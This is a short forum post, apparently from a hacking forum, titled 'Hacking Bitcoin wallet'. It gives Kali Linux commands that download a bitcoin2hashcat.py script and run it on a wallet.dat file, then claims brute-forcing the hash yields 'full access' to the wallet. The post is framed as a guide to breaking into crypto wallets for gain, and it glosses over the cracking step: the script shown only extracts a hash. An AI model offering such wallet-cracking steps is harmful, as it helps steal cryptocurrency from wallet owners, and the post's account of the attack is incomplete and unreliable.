Hacking Bitcoin wallet

BadB

Professional
Messages
2,455
Reaction score
2,442
Points
113
Good evening. Bitcoin cryptocurrency celebrated a victory of $ 60k. After this event, those who want to invest in the money of the future have certainly grown, today we have only one console and will try to hack a crypto-wallet.

Open a terminal from Kali Linux and write the following commands:
Code:
?apt-get update && apt-get upgrade
?apt install wget python -y
?wget https://raw.githubusercontent.com/stricture/hashstack-server-plugin-oclhashcat/master/scrapers/bitcoin2hashcat.py

And run it:
Code:
?python ./bitcoin2hashcat.py <path to wallet.dat>

The attack process itself:
The process of brute-forcing the password by hash will start, which can take a long time (depending on the complexity of the password and the power of the computer). As a result of the script's work, we can get a password for full access to wallet.dat.
 
Top